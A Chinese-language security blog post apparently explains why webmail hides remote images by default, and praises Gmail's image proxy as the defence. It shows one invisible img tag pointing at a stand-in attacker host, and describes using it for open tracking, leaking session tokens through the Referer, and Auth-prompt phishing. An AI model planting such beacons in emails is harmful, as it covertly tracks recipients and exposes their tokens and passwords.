黑客视角:邮件为什么默认不显示图片

信息安全 2653 Views

你会发现很多好邮箱在查看不可信邮件时,图片会默认不显示,为什么呢?

注意:我说的是好邮箱:)

站在黑客角度来给出答案。

大多数专业邮箱都默认不显示图片,因为如果邮件内容包含如下代码(很合法,不会被常规过滤):

<img src=http://evilsite/hi.php width=0 height=0 />

看,src 的值可以不需要是真图片。

这样可以隐蔽地得到邮件 URL(即 Referer,即浏览器地址栏那个 URL)。

有什么用呢?

1、邮件打开跟踪:只要邮件被查看就会请求这个 hi.php 地址,hi.php 可以做好记录,除了记录是否被请求了,还可记录邮件 URL、用户浏览器 User-Agent、用户 IP 地址等。这个可以做个邮件跟踪系统了:)

有了这个,根本不需要「已读回执」功能了。

有了这个,搞垃圾邮件群发的,各位脑洞大开下,他们会有多开心。

2、某些手机端邮箱:传统的 WAP 或 APP(本质是 Web 的情况),Referer 可能会包括用户身份 token,这会导致身份 token 轻易泄露,账号被盗。

3、有人用 hi.php 来玩钓鱼攻击:hi.php 可以被设置需要 Auth 等认证,这时一查看邮箱就弹出一个 Auth 窗口,提醒输入用户名密码,只要场景设计好,有一定概率,用户会被钓鱼。

4、确实,图片可以很好躲避基于文本的贝叶斯反垃圾机制。默认屏蔽图片,「意外」屏蔽了这个眼不见心不烦的烦恼?

就这么小的一个点,这些年来一直出现各种对抗,出现个对抗又被修复。什么是好邮箱?好邮箱就是这么小的一个点,必须把控好安全与体验的那种平衡:)

前面说了不可信邮件默认不显示图片,那如何可信呢?你想想?

另外,补充说明下:

像 Gmail 这样全球最安全的邮箱,它会把邮件图片下载到自己的 googleusercontent.com 域下:

  1. 这个域名和Gmail的域名不一样,做了漂亮的分离;

  2. 图片 Cache 到了 Google 自己可控的域下,安全可以很好保障;

  3. Google 可以对这海量图片做各种机器学习,多好。

EOF.

—————–

有什么好问题可以问我,灵感一来我就发文,因为忙着研发黑客酷产品,所以更新会比较懒。

余弦@知道创宇

共鸣的话,可以选择关注我这个公众号「Lazy-Thought」

永久 Blog:evilcos.me

如未说明则本站原创,转载请注明出处:NULL » 黑客视角:邮件为什么默认不显示图片